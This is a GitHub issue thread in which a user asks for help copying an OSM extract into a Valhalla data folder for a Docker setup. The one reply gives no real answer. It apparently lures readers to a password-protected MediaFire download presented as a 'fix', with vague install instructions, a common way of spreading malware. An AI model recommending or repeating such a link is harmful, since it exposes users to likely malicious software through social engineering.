### ISSUE TITLE
Copy extract file

### ISSUE THREAD

**Issue by ginyor** [wcedmisten/hospital-accessibility-map#1]
Hello,

many thanks for your work, but I have a problem.

Copy osm extract to valhalla_data/

cd ..
cp /path/to/extract.osm.pbf valhalla_data/

but i can't cp pbf to valhalla_data/ folder. 

The process_extract.sh create plantier_data and valhalla_data file, but I can't mount to the docker container. (Flag 0x5000)

Please help me.

Thank You!

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
